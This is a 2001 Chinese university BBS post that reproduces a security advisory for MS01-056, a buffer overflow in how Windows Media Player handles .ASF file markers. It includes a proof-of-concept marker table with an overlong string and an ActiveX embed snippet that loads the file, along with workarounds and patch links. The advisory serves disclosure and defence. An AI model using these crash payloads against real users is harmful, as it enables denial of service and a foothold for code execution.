● 媒体播放器.ASF文件标记缓冲区溢出漏洞(MS01-05 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: michaelx (水并不是这样灌的), 信区: Security
标  题: 媒体播放器.ASF文件标记缓冲区溢出漏洞(MS01-056)
发信站: 荔园晨风BBS站 (Sat Nov 24 15:53:21 2001), 转信

Microsoft Windows媒体播放器.ASF文件标记缓冲区溢出漏洞(MS01-056)
发布日期: 2001-8-7
更新日期: 2001-11-21
受影响的系统:
Microsoft Windows Media Player 6.4
Microsoft Windows Media Player 7
Microsoft Windows Media Player 7.1
   - Microsoft Windows NT
   - Microsoft Windows 2000
Windows Media Player for Windows XP
   - Microsoft Windows XP
描述:
----------------------------------------------------------------------------
----
微软的媒体播放器在处理.ASF文件中的标记时没有进行有效的边界检查，如果攻击者设
置
一个超长的标记，就有可能触发缓冲区溢出。攻击者可以通过发送邮件或者在网页上提
供
恶意.ASF文件的方式来诱使受害者打开恶意文件，当受害者点击弹出来的菜单条时，媒
体
播放器可能崩溃或者执行攻击者设定的任意代码。
<*来源：Pauli Ojanpera (pauli_ojanpera@hotmail.com) *>
测试程序：
----------------------------------------------------------------------------
----
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Pauli Ojanpera (pauli_ojanpera@hotmail.com)提供了下列测试方法：
使用ASFCHOP.EXE程序在一个ASF文件中嵌入下列脚本语句：
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----
当用户点击菜单条时，媒体播放器将崩溃。
对于媒体播放器7,需要使用ActiveX控件来使其执行有问题的WMP模块：
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
    <PARAM NAME="ShowControls" VALUE="-1">
    <PARAM NAME="ShowGotoBar" VALUE="1">
    <PARAM NAME="ShowStatusBar" VALUE="1">
        <PARAM NAME="ControlType" VALUE="2">
        <PARAM NAME="Filename" VALUE="a.asf">
        <PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>
----------------------------------------------------------------------------
----
建议:
临时解决方法：
不要点击ASF文件中的菜单条。
厂商补丁：
微软已经为此发布了一个安全公告（MS01-056）以及相应补丁程序：
http://www.microsoft.com/technet/security/bulletin/MS01-056.asp
补丁下载地址：
      Windows Media Player 6.4、7或7.1：
      http://download.microsoft.com/download/winmediaplayer/Update/308567/WI
N98MeXP/EN-US/wm308567.exe
      Windows Media Player for Windows XP:
      http://windowsupdate.com

--
M.X的FTP SERVER
ftp://192.168.55.18

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 203.93.19.1]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店